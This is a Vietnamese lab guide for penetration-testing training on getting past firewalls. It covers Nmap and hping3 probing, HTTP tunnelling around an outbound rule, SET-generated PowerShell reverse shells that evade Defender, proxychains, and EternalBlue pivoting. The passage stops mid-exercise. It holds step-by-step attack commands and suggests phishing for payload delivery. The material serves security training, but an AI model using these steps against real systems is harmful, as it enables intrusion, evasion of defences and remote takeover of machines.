CEH v13 AI – CEH VIETNAM

CPENT+LPT : Mô-đun 07: Phương pháp Kiểm tra Xâm nhập Mạng – Thiết bị Ngoại vi

Mục tiêu Bài thực hành này sẽ chỉ cho bạn cách vượt qua tường lửa bằng cách sử dụng các công cụ như HTTTPort và HPHing3. Kịch bản Những kẻ tấn công liên tục tìm kiếm các máy khách dễ bị tấn công để xâm nhập vào mạng của họ thông qua việc giả mạo…

IT-PRO

Mục tiêu

Bài thực hành này sẽ chỉ cho bạn cách vượt qua tường lửa bằng cách sử dụng các công cụ như HTTTPort và HPHing3.

Kịch bản

Những kẻ tấn công liên tục tìm kiếm các máy khách dễ bị tấn công để xâm nhập vào mạng của họ thông qua việc giả mạo IP. Giả mạo IP là hành vi giả mạo địa chỉ IP của một máy khách để che dấu lưu lượng truy cập. Như đã giải thích ở bài thực hành trước, nếu kẻ tấn công có thể xác định được địa chỉ IP, chúng có thể sử dụng thông tin này để gây thiệt hại hoặc đánh cắp dữ liệu. Những kẻ tấn công có thể truy cập gói tin thông qua tường lửa bằng cách giả mạo địa chỉ IP trong gói tin. Những kẻ tấn công cũng có thể sử dụng các gói Trojan để thu thập thông tin, chẳng hạn như mật khẩu đăng ký. Thông tin đăng ký của người dùng có thể là thảm họa cho một tổ chức. Do đó, quản trị viên mạng nên được đào tạo để chặn các cuộc tấn công giả mạo IP bằng cách trích xuất thông tin từ các gói dữ liệu được chụp, chẳng hạn như nguồn và đích, kiểu tiêu đề giao thức, độ dài, cổng nguồn và đích, v.v., và so sánh các chi tiết này với các đặc trưng tấn công được mô hình hóa để xác định xem một cuộc tấn công đã xảy ra hay chưa. Ngoài ra, việc quen thuộc với kỹ thuật đường hầm HTTP là rất quan trọng vì nó giúp xác định các rủi ro bổ sung mà việc quét mạng và lỗ hổng đơn giản có thể không phát hiện được, và xác định mức độ mà hệ thống IDS mạng có thể xác định lưu lượng truy cập độc hại trong một môi trường truyền thông.

Bài tập 1: Quét bằng Nmap đối với Tường lửa

Kịch bản

Một trong những công cụ phổ biến nhất là quét bằng Nmap. Như bạn đã khám phá, đã có nhiều trường hợp quét Nmap được sử dụng. Khi phát hiện tường lửa, việc tiến hành kiểm tra thâm nhập trở nên khó khăn hơn do nhiều cổng đóng và các dịch vụ được cài đặt.

Trong quá trình kiểm tra thâm nhập, chúng ta sẽ bắt đầu với một trong những công cụ phổ biến nhất trên thị trường, đó là quét nguồn mở. Nmap cũng có các tùy chọn giúp đạt được kết quả tốt hơn khi quét các máy khách.

Các mục tiêu của bài tập này là giúp bạn sử dụng Nmap và thử các tùy chọn nâng cao để quét thông qua bộ lọc.

  • Quét một mục tiêu
  • Quan sát và phân tích kết quả quét
  • Thử các tùy chọn nâng cao để quét qua bộ lọc
  1. Nhấp vào Parrot: Màn hình đăng nhập Parrot xuất hiện, nhập toor trong trường Mật khẩu và nhấn Enter.
  2. Bây giờ bạn đã sẵn sàng để kiểm tra các quy tắc. Đầu tiên, khởi động một trình phân tích giao thức khi bạn bắt đầu kiểm tra các quy tắc. Khởi động Wireshark, mở một cửa sổ terminal và nhập sudo wireshark và nhấn Enter. Nhập toor khi được hỏi Mật khẩu và nhấn Enter.
  3. Nhấp đúp vào giao diện eth0 để bắt đầu chụp. Thu nhỏ cửa sổ Wireshark.
  4. Mở một cửa sổ terminal mới, nhập ping 192.168.0.51 và nhấn Enter.
    Chuyển sang cửa sổ Wireshark để xem bản ghi.

192.168.0.51 là địa chỉ IP của máy ảo RPC Server Ubuntu.

  1. Nhấp vào nút Dừng Ghi Gói trên thanh menu để dừng ghi gói.
    Dành vài phút để xem lại các gói trong Wireshark như trong ảnh chụp màn hình.
  2. Bạn chưa thiết lập bất kỳ bảo vệ nào, vì vậy bạn sẽ có thể ping. Ngay khi bạn bật bảo vệ, điều này sẽ thay đổi. Một phần của kỹ thuật nâng cao là xác định điều gì đang xảy ra giữa chúng ta và mục tiêu, vì vậy bạn nên tìm ra chính xác điều gì đang ngăn chặn lưu lượng truy cập.
  3. Khởi động một cửa sổ terminal, nhập nmap -sc 192.168.0.51 và nhấn Enter, như được hiển thị trong ảnh chụp màn hình.

192.168.0.51 là địa chỉ IP của máy ảo RPC Server Ubuntu.

  1. Chuyển sang máy ảo RPC Server Ubuntu, theo mặc định, hồ sơ người dùng quản trị viên được chọn, nhập Infiniti3 vào trường Mật khẩu và nhấn Enter để đăng nhập.
  2. Sau khi đăng nhập vào máy, khởi động một cửa sổ terminal và nhập sudo iptables -P INPUT DROP. Nhập Infiniti3 và nhấn Enter khi được hỏi mật khẩu.
  3. Sau khi bạn đã nhập quy tắc, tất cả các gói tin đến sẽ bị chặn. Để xem quy tắc của bạn, nhập sudo iptables -L và nhấn Enter. Nhập Infiniti3 và nhấn Enter khi được hỏi mật khẩu.
  4. Chuyển sang Parrot và phóng to cửa sổ Wireshark và nhấp vào Bắt đầu Ghi Gói (biểu tượng Cá mập Wireshark) để bắt đầu ghi gói mới. Để cửa sổ Wireshark chạy.

Nếu các gói chưa lưu xuất hiện, nhấp vào Tiếp tục mà không Lưu.

  1. Khởi động một cửa sổ terminal mới, sau đó nhập nmap -sc 192.168.0.51 -n và nhấn Enter.
    Như ảnh chụp màn hình cho thấy, cấu hình này làm giảm bề mặt tấn công xuống 0. Hành động này, khi bạn đang làm việc trong một vành đai, sẽ được lặp lại nhiều lần với các biến thể khác nhau. Đây là cách các đối thủ đánh giá môi trường và phát hiện bất kỳ điểm yếu nào hoặc xuyên qua cấu hình của quản trị viên.
  2. Phóng to cửa sổ Wireshark và sau đó nhập ip.dst == 192.168.0.51 vào bộ lọc và nhấn Enter để áp dụng bộ lọc. Bây giờ, hãy xem lưu lượng truy cập được ghi lại và sau đó xóa bộ lọc.
  3. Khởi động một cửa sổ terminal mới, nhập ping 192.168.0.51, và nhấn Enter, sau đó chuyển sang cửa sổ Wireshark để xem bản ghi gói. Bạn sẽ thấy thông báo trong bản ghi gói cho biết không có phản hồi từ máy mục tiêu.
  4. Đối với hầu hết các thiết bị, iptables được cấu hình theo cách này theo mặc định. Bạn không cần phải thay đổi cấu hình này cho các thiết bị khác. Nhưng bạn có thể đã biết cách chặn Giao thức Tin nhắn Điều khiển Internet (ICMP) loại 3 mã 13.
  5. Cấu hình máy Ubuntu để mô phỏng hành vi của thiết bị lọc. Chuyển sang máy ảo RPC Server Ubuntu và trong cửa sổ terminal, nhập các lệnh sau và nhấn Enter:
  • sudo iptables -P INPUT ACCEPT
  1. Để đặt một cái gì đó tương tự như hành vi ACL này trong iptables, nhập sudo iptables -A INPUT ! -p icmp –icmp-type 8 -j REJECT –reject-with icmp-host-prohibited và nhấn Enter.
  2. Chuyển sang Parrot và phóng to cửa sổ Wireshark và nhấp vào Bắt đầu Ghi Gói (biểu tượng Cá mập Wireshark) để bắt đầu ghi gói mới. Để cửa sổ Wireshark chạy.

Nếu các gói chưa lưu xuất hiện, nhấp vào Tiếp tục mà không Lưu.

  1. Thực hiện quét Nmap (nmap -sc 192.168.0.51), sau đó xem lại thông tin trong Wireshark.
  2. Khi bộ lọc đã được thiết lập, bạn phải xác định phương pháp để vượt qua nó. Điều này kết thúc các hướng dẫn liên quan của bài tập này. Đóng tất cả các cửa sổ đã được mở trong cả hai máy.

Bài tập 2: Xác định và Vượt qua Tường lửa

Kịch bản

Những kẻ tấn công liên tục tìm kiếm các máy khách dễ bị tấn công để xâm nhập vào mạng của họ thông qua việc giả mạo IP. Giả mạo IP là hành vi giả mạo địa chỉ IP của một máy khách để che dấu lưu lượng truy cập. Như đã giải thích ở bài thực hành trước, nếu kẻ tấn công có thể xác định được địa chỉ IP, chúng có thể sử dụng thông tin này để gây thiệt hại hoặc đánh cắp dữ liệu. Những kẻ tấn công có thể truy cập gói tin thông qua tường lửa bằng cách giả mạo địa chỉ IP trong gói tin. Những kẻ tấn công cũng có thể sử dụng các gói Trojan để thu thập thông tin, chẳng hạn như mật khẩu đăng ký. Thông tin đăng ký của người dùng có thể là thảm họa cho một tổ chức.

Do đó, với tư cách là quản trị viên mạng, bạn nên có khả năng xác định các cuộc tấn công giả mạo IP bằng cách trích xuất thông tin từ các gói dữ liệu được chụp, chẳng hạn như địa chỉ nguồn và đích, kiểu tiêu đề giao thức, độ dài, cổng nguồn và đích, v.v., và so sánh các chi tiết này với các đặc trưng tấn công được mô hình hóa để xác định xem một cuộc tấn công đã xảy ra hay chưa.

Thời lượng bài thực hành: 15 phút

  1. Nhấp vào Web Server, nhấp vào Ctrl+Alt+Delete.
  2. Trong trường mật khẩu, nhấp vào Pa w0rd và nhấp vào nút Đăng nhập hoặc nhấn Enter. Đóng cửa sổ Trình quản lý Máy chủ xuất hiện.
  3. Điều hướng đến menu Bắt đầu và nhấp vào Bảng Điều khiển. Khi Bảng Điều khiển xuất hiện, nhấp vào Tường lửa của Windows. Nhấp vào Bật hoặc Tắt Tường lửa của Windows trong ngăn bên trái.
  4. Bây giờ, để tùy chỉnh cài đặt tường lửa của windows, chọn nút radio Bật Tường lửa của Windows trong cả hai cài đặt vị trí mạng và nhấp vào OK.
  5. Bây giờ Tường lửa của Windows đã được BẬT trên máy Web Server.
  6. Nhấp vào Parrot: Màn hình đăng nhập Parrot xuất hiện, nhập toor trong trường Mật khẩu và nhấn Enter.
  7. Nhấp vào biểu tượng Terminal từ thanh tác vụ để khởi động.
  8. Bây giờ hãy kiểm tra kết nối giữa Máy Tấn công (Parrot) và Máy Nạn nhân (Web Server). Để kiểm tra, nhập ping 172.19.19.7 trong terminal và nhấn Enter. Nếu ping thành công, nghĩa là máy từ xa đang phản hồi với 64 byte bộ nhớ, sau đó nhấn Ctrl+C để dừng ping máy.

Lệnh ping không đủ để vượt qua việc truyền gói tin giữa hai máy.

  1. Thực hiện traceroute đến máy nạn nhân, mở một cửa sổ terminal khác và nhập traceroute 172.19.19.7 và nhấn Enter. Sau khi Kết nối Bị Từ chối bởi Tường lửa Windows, không có kết quả traceroute nào được hiển thị như trong ảnh chụp màn hình. Nhấn Ctrl+C trên bàn phím để dừng lệnh traceroute.

Lệnh Traceroute sẽ theo dõi gói tin di chuyển giữa hai máy.

  1. Bây giờ, nhập lệnh sau sudo nmap –script=firewall-bypass,traceroute 172.19.19.7 và nhấn Enter. Nhập toor và nhấn Enter khi được hỏi mật khẩu. Lệnh này sẽ kiểm tra các cổng mở trên máy mục tiêu, như được hiển thị trong ảnh chụp màn hình. Các cổng được lọc được liệt kê trong Kết quả Tập lệnh Host và chi tiết Traceroute.
  2. Bây giờ, nhập sudo hping3 -S 172.19.19.7 -c 100 -p + + và nhấn Enter. Nhập toor và nhấn Enter khi được hỏi mật khẩu. Lệnh hping sẽ ping từng cổng từ 1 đến 100 theo thứ tự tăng dần và hiển thị phản hồi. Trong ảnh chụp màn hình, bạn có thể thấy rằng chỉ có 2 gói được truyền đến cổng 21 và 80 và các gói khác bị tường lửa chặn. Bạn có thể sử dụng hai cổng mở này để thực hiện kiểm tra thâm nhập của mình.

Quá trình quét mất khoảng 5 phút để hoàn thành.

-S là để đặt cờ SYN TCP.

  1. Đóng tất cả các cửa sổ.
    Trong bài thực hành này, bạn đã học cách xác định và vượt qua tường lửa.

Bài tập 3: Đường hầm HTTP để Vượt qua Tường lửa Sử dụng HTTTPort

Kịch bản

Những kẻ tấn công liên tục tìm kiếm các máy khách dễ bị tấn công để xâm nhập vào mạng của họ thông qua việc giả mạo IP. Giả mạo IP là hành vi giả mạo địa chỉ IP của một máy khách để che dấu lưu lượng truy cập. Như đã giải thích ở bài thực hành trước, nếu kẻ tấn công có thể xác định được địa chỉ IP, chúng có thể sử dụng thông tin này để gây thiệt hại hoặc đánh cắp dữ liệu. Những kẻ tấn công có thể truy cập gói tin thông qua tường lửa bằng cách giả mạo địa chỉ IP trong gói tin. Những kẻ tấn công cũng có thể sử dụng các gói Trojan để thu thập thông tin, chẳng hạn như mật khẩu đăng ký. Thông tin đăng ký của người dùng có thể là thảm họa cho một tổ chức.

Do đó, với tư cách là quản trị viên mạng, bạn nên có khả năng xác định các cuộc tấn công giả mạo IP bằng cách trích xuất thông tin từ các gói dữ liệu được chụp, chẳng hạn như địa chỉ nguồn và đích, kiểu tiêu đề giao thức, độ dài, cổng nguồn và đích, v.v., và so sánh các chi tiết này với các đặc trưng tấn công được mô hình hóa để xác định xem một cuộc tấn công đã xảy ra hay chưa.

Ngoài ra, việc quen thuộc với kỹ thuật đường hầm HTTP là rất quan trọng vì nó giúp xác định các rủi ro bổ sung mà việc quét mạng và lỗ hổng đơn giản có thể không phát hiện được, và xác định mức độ mà hệ thống IDS mạng có thể xác định lưu lượng truy cập độc hại trong một môi trường truyền thông.

Thời lượng bài thực hành: 30 phút

  1. Nhấp vào FTP Server, nhấp vào Ctrl+Alt+Delete và nhấp vào biểu tượng Mũi tên Quay lại bên cạnh hồ sơ người dùng và sau đó chọn tài khoản Student để đăng nhập.
  2. Trong trường mật khẩu đăng nhập, nhấp vào Pa w0rd.
  3. Nhấp chuột phải vào Bắt đầu và nhấp vào Bảng Điều khiển từ menu ngữ cảnh như trong ảnh chụp màn hình. Cửa sổ Tất cả Mục của Bảng Điều khiển xuất hiện, nhấp vào Công cụ Quản trị. Trong cửa sổ Công cụ Quản trị, nhấp đúp vào Dịch vụ.

Nếu có bất kỳ cửa sổ bật lên nào xuất hiện, nhấp vào Không để đóng.

  1. Cửa sổ Dịch vụ xuất hiện, cuộn xuống và nhấp chuột phải vào Dịch vụ Xuất bản World Wide Web và nhấp vào tùy chọn Dừng.
  2. Theo cách tương tự, nhấp chuột phải vào Dịch vụ IIS Admin và nhấp vào tùy chọn Dừng. Thu nhỏ cửa sổ Dịch vụ.
  3. Nhấp đúp vào thư mục HTTHost trên Màn hình và nhấp đúp vào httpost.exe.
  4. Nếu Mở Tệp – Cảnh báo Bảo mật bật lên trên màn hình, nhấp vào Chạy.
  5. Cửa sổ HTThost 1.8.5 xuất hiện như trong ảnh chụp màn hình.
  6. Chọn tab Tùy chọn. Trong tab Tùy chọn, đặt tất cả các cài đặt về mặc định ngoại trừ trường Mật khẩu Cá nhân, bạn nên điền bất kỳ mật khẩu nào trong bài thực hành này. Chọn các tùy chọn Đánh giá lại Tên DNSĐăng nhập Kết nối, và nhấp vào Áp dụng.
  7. Kiểm tra xem dòng cuối cùng là: Trình nghe: Nghe ở 0.0.0.0:80 trong Nhật ký Ứng dụng, điều này đảm bảo rằng HTThost đang chạy đúng cách và đã bắt đầu nghe ở cổng 80.
  8. Đóng bảng điều khiển Dịch vụ. Để HTThost chạy, và không tắt máy FTP Server.
  9. Nhấp vào Windows Server 2019, nhấp vào Ctrl+Alt+Delete.
  10. Trong hộp đăng nhập, nhấp vào Pa w0rd và nhấn Enter.

Bạn có thể sử dụng tùy chọn Nhập Mật khẩu từ menu Lệnh để nhập mật khẩu.

  1. Khởi động Bảng Điều khiển. Để khởi động Bảng Điều khiển, nhấp vào Bắt đầu và nhấp vào ứng dụng Bảng Điều khiển từ menu ứng dụng.
  2. Cửa sổ Tất cả Mục của Bảng Điều khiển xuất hiện và hiển thị tất cả các mục của bảng điều khiển. Nhấp vào Tường lửa của Windows Defender.
  3. Bảng điều khiển Tường lửa của Windows Defender xuất hiện, nhấp vào liên kết Bật hoặc Tắt Tường lửa của Windows ở ngăn bên trái.
  4. Cửa sổ Tùy chỉnh cài đặt xuất hiện. Chọn Bật Tường lửa của Windows trong cài đặt mạng Riêng tưcài đặt mạng Công cộng. Nhấp vào OK.
  5. Tường lửa đã được bật thành công. Bây giờ, nhấp vào cài đặt Nâng cao ở ngăn bên trái.
  6. Cửa sổ Tường lửa của Windows Defender với Bảo mật Nâng cao xuất hiện. Chọn Quy tắc Ra trong ngăn bên trái. Bảng Quy tắc Ra cũng được hiển thị. Nhấp vào Quy tắc Mới… trong ngăn bên phải (dưới Quy tắc Ra).
  7. Trong Trình hướng dẫn Quy tắc Ra Mới, chọn Cổng làm Kiểu Quy tắc và nhấp vào Tiếp theo.
  8. Chọn Tất cả các cổng từ xa trong Giao thức và Cổng và nhấp vào Tiếp theo.
  9. Trong Hành động, Chặn kết nối được chọn theo mặc định. Nhấp vào Tiếp theo.
  10. Trong phần Hồ sơ, đảm bảo rằng tất cả các tùy chọn (Miền, Riêng tư và Công cộng) đều được chọn và nhấp vào Tiếp theo.
  11. Trong Tên, nhập Cổng 21 Bị Chặn vào trường Tên và nhấp vào Kết thúc.
  12. Quy tắc mới Cổng 21 Bị Chặn được tạo. Nhấp chuột phải vào quy tắc mới được tạo (Cổng 21 Bị Chặn) và nhấp vào Thuộc tính.
  13. Cửa sổ Thuộc tính cho Cổng 21 Bị Chặn xuất hiện. Chọn tab Giao thức và Cổng. Trong trường Cổng Từ xa, chọn tùy chọn Cổng Cụ thể từ danh sách thả xuống và nhập 21 làm Số Cổng. Để các cài đặt khác ở mặc định, nhấp vào Áp dụngOK.
  14. Tắt quy tắc và kiểm tra xem bạn có thể kết nối với trang FTP hay không. Nhấp chuột phải vào quy tắc mới được thêm và nhấp vào Tắt Quy tắc.
  15. Khởi động dòng lệnh và ban hành ftp 172.19.19.17. Bạn sẽ được yêu cầu nhập tên người dùng. Điều này có nghĩa là bạn có thể thiết lập kết nối FTP. Nhấn Ctrl+C để chấm dứt phiên. Phóng to dòng lệnh để đóng nó.

172.19.19.17 là địa chỉ IP của máy Phòng Kinh doanh.

  1. Phóng to cửa sổ Tường lửa của Windows Defender với Bảo mật Nâng cao. Bây giờ, bật quy tắc và kiểm tra xem bạn có thể thiết lập kết nối hay không. Nhấp chuột phải vào quy tắc mới được thêm và nhấp vào Bật Quy tắc.
  2. Khởi động Dòng lệnh và kiểm tra xem bạn có thể kết nối với trang FTP bằng cách ban hành lệnh ftp 172.19.19.17 như trong ảnh chụp màn hình hay không. Quy tắc ra mới được thêm nên chặn kết nối.

Nếu bạn không được yêu cầu nhập thông tin đăng nhập, điều đó có nghĩa là kết nối đã bị chặn.

  1. Đóng tất cả các cửa sổ. Bây giờ, thực hiện đường hầm bằng cách sử dụng HTTTPort để thiết lập kết nối với trang FTP nằm trên máy FTP Server.

32-33. Điều hướng đến Bắt đầu và điều hướng đến thư mục HTTPort 3.5NFM và nhấp đúp vào httport.exe. Làm theo các bước cài đặt hướng dẫn của trình hướng dẫn để cài đặt HTTTPort.

  1. Một trình hướng dẫn giới thiệu xuất hiện, nhấp vào Tiếp theo 5 lần cho đến khi kết thúc trình hướng dẫn và sau đó nhấp vào Đóng.
  2. Cửa sổ chính của HTTPort (HTTPort 3.5NFM) xuất hiện như trong ảnh chụp màn hình.
  3. Chọn tab Proxy và nhập địa chỉ IP của máy FTP Server, tức là 172.19.19.9 (vì HTThost đang chạy trên máy đó), và nhập cổng của bạn là 80. Trong phần Tùy chọn Misc, trong Chế độ Vượt qua, chọn Vượt qua HTTP từ danh sách thả xuống, và ở trường Sử dụng Máy chủ Từ xa (tắt at):, xóa tất cả. Để trường Mật khẩu trống. Nhập magic vào trường Mật khẩu.
  4. Chọn tab Ánh xạ Cổng và nhấp vào Thêm để tạo Ánh xạ Mới.
  5. Nhấp chuột phải vào nút Ánh xạ Mới và nhấp vào Chỉnh sửa.
  6. Đổi tên thành ftp đến nhà (bạn có thể nhập tên tùy chọn). Nhấp chuột phải vào nút bên dưới Cổng Cục bộ sau đó nhấp vào Chỉnh sửa và nhập 21 làm giá trị cổng. Nhấp chuột phải vào nút bên dưới Giao thức sau đó nhấp vào Chỉnh sửa và nhập 21 làm giá trị giao thức. Nhấp chuột phải vào nút bên dưới Cổng Từ xa và nhấp vào Chỉnh sửa và nhập 21 làm giá trị cổng.

172.19.19.17 được chỉ định trong nút Máy chủ Từ xa là địa chỉ IP của trang FTP được lưu trữ trên máy Phòng Kinh doanh.

  1. Chuyển lại tab Proxy và nhấp vào Bắt đầu để bắt đầu đường hầm HTTP.
  2. HTTTPort chặn yêu cầu FTP để đăng nhập và chuyển nó qua HTThost được cài đặt trên máy từ xa kết nối với bạn ở 172.19.19.9. Điều này có nghĩa là bạn có thể không truy cập được trang FTP trực tiếp bằng cách ban hành ftp 172.19.19.17 trong dòng lệnh, nhưng bạn sẽ có thể truy cập FTP thông qua máy chủ cục bộ ở 172.19.19.0.1.
  3. Khởi động Dòng lệnh và nhập ftp 172.19.19.17 và nhấn Enter. Kết nối ftp sẽ bị chặn bởi quy tắc ra.
  4. Bây giờ, khởi động một Dòng lệnh mới, nhập ftp 127.0.0.1 và nhấn Enter. Bạn sẽ có thể kết nối với trang web.
  5. Nhập thông tin đăng nhập của bất kỳ tài khoản người dùng nào của Phòng Kinh doanh. Trong bài thực hành này, chúng tôi đang sử dụng thông tin đăng nhập của tài khoản Quản trị viên. Nhập tên người dùng (Admin) và mật khẩu (test@123) và nhấn Enter.

Mật khẩu bạn nhập sẽ không hiển thị.

  1. Bạn đã đăng nhập thành công ngay cả sau khi thêm quy tắc ra tường lửa, điều này chứng tỏ rằng một đường hầm đã được thiết lập bởi HTTTPort và HTThost, vượt qua tường lửa. Bây giờ bạn có quyền truy cập để thêm các tệp vào thư mục ftp nằm trên máy Phòng Kinh doanh. Nhập mkdir Test và nhấn Enter.
  2. Nhấp vào liên kết \lab VirtualMachines\SalesDepartment\SubnetLink. Chọn Đăng nhập. Đăng nhập vào máy với Tên Người dùng Admin và mật khẩu là test@123.
  3. Điều hướng đến C:\testftp\root. Một thư mục có tên Test sẽ được tạo trong thư mục ftproot như trong ảnh chụp màn hình.
  4. Do đó, bạn đã vượt qua tường lửa windows thành công. Để hoàn thành bài tập, dừng Đường hầm bằng cách sử dụng HTTTPort. Tắt quy tắc ra, bật Dịch vụ IIS AdminDịch vụ Xuất bản World Wide Web trên máy FTP Server. Đóng tất cả các ứng dụng, tệp và thư mục đã được mở trong khi thực hiện bài tập này.

Trong bài thực hành này, bạn đã học cách bảo mật và lập tài liệu về kết quả liên quan đến bài thực hành.

Bài tập 4: Né tránh Sử dụng Bộ công cụ Kỹ thuật Xã hội (SET)

Kịch bản

Một phần quan trọng của kiểm tra thâm nhập là khả năng né tránh bị phát hiện khi nó nằm trong phạm vi công việc. Chúng ta sẽ thử một kỹ thuật né tránh của Windows Defender PowerShell.

Mục tiêu của bài thực hành này là hướng dẫn học viên sử dụng Bộ công cụ Kỹ thuật Xã hội để tạo né tránh của Windows Defender. Kỹ thuật này cũng có thể được sử dụng chống lại bất kỳ phần mềm chống vi-rút nào và nhiều công cụ bảo vệ dựa trên máy chủ khác.

Trong bài thực hành này, bạn sẽ:

  • Tạo tập lệnh PowerShell
  • Gửi tệp tập lệnh PowerShell đến máy mục tiêu
  • Cố gắng khai thác máy

Thời lượng bài thực hành: 10 phút

  1. Máy mục tiêu của chúng ta là Windows Server 2008 và sau đó là Windows Server 2016. Hiện tại, việc vượt qua bảo vệ của Windows trở nên khó khăn hơn, nhưng sau này, những kỹ thuật này có thể không hiệu quả. Người kiểm tra phải kiểm tra các kỹ thuật này để truy cập và ghi lại.
  2. Nhấp vào Parrot: Màn hình đăng nhập Parrot xuất hiện, nhập toor trong trường Mật khẩu và nhấn Enter.

Nếu bạn đã đăng nhập, hãy chuyển đến bước 3.

  1. Khởi động một terminal và nhập sudo setoolkit và nhấn Enter. Nhập toor trong trường mật khẩu và nhấn Enter để đăng nhập.
  2. Nhập y và nhấn Enter để chấp nhận các điều khoản và dịch vụ của setoolkit.
  3. Nhập 1 và nhấn Enter để chọn tùy chọn Tấn công Kỹ thuật Xã hội.
  4. Như menu hiển thị, có rất nhiều phương tiện để lựa chọn, hãy chọn một phương tiện và thoải mái nghiên cứu và khám phá. Bây giờ, nhập 9 và nhấn Enter để chọn Phương tiện Tấn công PowerShell.
  5. Khi bạn xem lại các hướng dẫn của mô-đun, hãy đọc Tạo shellcode PowerShell và kiểm tra xem bạn có thể lấy được shell trên máy Windows Server 2008 hay không.

Lưu ý rằng bạn đang tập trung vào phương tiện tấn công phía máy khách, phần lớn là phương tiện chính cho các cuộc tấn công trên Windows.

  1. Nhập 1 để chọn tùy chọn đầu tiên và nhấn Enter.
  2. Nhập địa chỉ IP của máy Parrot và nhấn Enter. Ở đây, địa chỉ IP của máy Parrot là 192.168.0.18.
  3. Bạn có thể chấp nhận cổng mặc định hoặc chọn một cổng của riêng mình; điều này sẽ rất quan trọng nếu bạn phải sử dụng. Sử dụng cổng tùy chỉnh và nhập 443. Để chấp nhận cổng mặc định, chỉ cần nhấn Enter.
  4. Khi được hỏi, hãy khởi động trình nghe, nhập yes và nhấn Enter.
  5. Metasploit sẽ đặt mã PowerShell trong thư mục này.
  6. Việc di chuyển tệp đến máy mục tiêu thường được thực hiện bằng phương tiện lừa đảo. Tuy nhiên, bạn có thể sử dụng nhiều kỹ thuật khác để đưa tệp powershell.txt đến mục tiêu.
  7. Sau khi bạn đã chuyển tệp, hãy dán nội dung của nó vào Dòng lệnh. Lưu ý trong ảnh chụp màn hình, có một URL bổ sung được đặt bởi mã; sao chép liên kết này và sau đó dán nó vào email nháp, ví dụ, như trong ảnh chụp màn hình.
  8. Đăng nhập vào tài khoản email của bạn và mở bản nháp email, sau đó sao chép mã và lưu nó. Bây giờ, nhấp vào Ctrl+H để xem các tệp và thư mục ẩn. .set là thư mục ẩn.
  9. Chuyển sang máy Database Server và nhấp vào Ctrl+Alt+Delete. Nhấp vào Pa w0rd để đăng nhập với tư cách tài khoản Quản trị viên.
  10. Nhấp chuột phải vào biểu tượng Windows PowerShell trên Thanh tác vụ và nhấp vào Chạy với tư cách Quản trị viên như trong ảnh chụp màn hình.
  11. Mở tài khoản email của bạn và mở bản nháp shell PowerShell và sau đó sao chép và dán nó vào cửa sổ Windows PowerShell và nhấn Enter. Điều này sẽ liên kết với Windows Server 2008.
  12. Bạn có thể thực hiện cuộc tấn công này một lần nữa với Windows Server 2016. Nhấp vào Windows Server 2016 để chọn và nhấp vào Ctrl+Alt+Delete.
  13. Nhấp vào Pa w0rd để đăng nhập với tư cách Quản trị viên. Sau khi bạn đã đăng nhập vào máy, nhập powershell vào trường Tìm kiếm và sau đó nhấp chuột phải vào Windows PowerShell và sau đó nhấp vào Chạy với tư cách quản trị viên như trong ảnh chụp màn hình.
  14. Bây giờ, hãy mở tài khoản email của bạn và sao chép tập lệnh powershell và dán nó vào cửa sổ Windows PowerShell và nhấn Enter.
  15. Ngay khi bạn nhấn Enter, cửa sổ Windows PowerShell sẽ đóng lại. Bây giờ, hãy chuyển sang máy Parrot và quan sát rằng một phiên meterpreter đã được mở như trong ảnh chụp màn hình.
  16. Bạn có thể thiết lập tải trọng không có HTTPS. Bằng cách này, việc trao đổi chứng chỉ và handshake sẽ không diễn ra. Điều này kết thúc bài thực hành.

Bài tập 5: Chuỗi Proxy

Kịch bản

Trong bài thực hành này, bạn sẽ:

  • Sử dụng chuỗi proxy để thực hiện quét

Thời lượng bài thực hành: 10 phút

  1. Nhấp vào Parrot: Màn hình đăng nhập Parrot xuất hiện, nhập toor trong trường Mật khẩu và nhấn Enter.

Nếu bạn đã đăng nhập, hãy chuyển đến bước 2.

  1. Khởi động một cửa sổ terminal, nhập pluma /etc/proxychains.conf và nhấn Enter. Đọc kỹ thông tin và lưu ý cấu hình ở dưới cùng. Mặc dù điều này phục vụ mục đích của chúng ta cho bài thực hành, bạn có thể thêm nhiều thông tin hơn vào tệp này. Đóng cửa sổ trình soạn thảo văn bản.
  2. Trong cửa sổ terminal, nhập msfconsole và nhấn Enter để khởi động Metasploit Framework.
  3. Trong msfconsole, nhập search socks và nhấn Enter.
  4. Chọn máy chủ, nhập use auxiliary/server/socks4a và nhấn Enter.
  5. Khi mô-đun được tải, nhập info và nhấn Enter để đọc về mô-đun.
  6. Để thiết lập cổng, nhập set SRVPORT 9050 và nhấn Enter.
  7. Nhập run và nhấn Enter để chạy máy chủ.
  8. Để xác minh xem Máy chủ có đang chạy hay không, hãy mở một cửa sổ terminal mới và nhập sudo netstat -atn và nhấn Enter. Nhập toor và nhấn Enter khi được hỏi mật khẩu. Bạn sẽ thấy cổng đã được mở và đang nghe.
  9. Để chạy proxychains, nhập sudo proxychains nmap -ST 192.168.0.51 và nhấn Enter.

192.168.0.51 là địa chỉ IP của máy RPC Server Ubuntu.

Bài tập 6: Xoay trục

Kịch bản

Trong bài thực hành này, bạn sẽ sử dụng kỹ thuật xoay trục để truy cập vào một máy nằm trên cùng mạng chủ với mạng nội bộ.

Thời lượng bài thực hành: 10 phút

  1. Biểu đồ dưới đây giải thích điểm xoay trục. Bạn có thể tham khảo nó.
  2. Nhấp vào Parrot: Màn hình đăng nhập Parrot xuất hiện, nhập toor trong trường Mật khẩu và nhấn Enter.

Nếu bạn đã đăng nhập, hãy chuyển đến bước 3.

  1. Trong bài tập này, bạn sẽ tận dụng một khai thác trên máy Windows Server 2008 vào mạng được kết nối khác.
  2. Lỗ hổng ms17-010 có trên Windows Server 2008, bạn có thể sử dụng để thực hành xoay trục. Phương pháp xoay trục đến cùng mạng, yêu cầu truy cập qua máy bị xâm nhập ban đầu, rất hiệu quả.
  3. Khi khai thác nguồn mở của Metasploit, bạn có thể gặp sự cố với tải trọng xoay trục với kết nối bị xâm nhập ban đầu, vì vậy xoay trục bằng thủ công hoặc thông qua một kết nối được Metasploit cung cấp, lại trở nên cần thiết.
  4. Khởi động Metasploit Framework. Nhập msfconsole và nhấn Enter. Điều này sẽ khởi động Metasploit Framework.
  5. Nhập search ms17-010 và nhấn Enter.
  6. Nhập use exploit/windows/smb/ms17_010_eternalblue và nhấn Enter để tải mô-đun.
  7. Thiết lập mục tiêu khai thác. Ở đây, chúng tôi đang chọn Database Server làm mục tiêu và IP của Database Server là 192.168.0.21. Nhập set RHOST 192.168.0.21 và nhấn Enter.
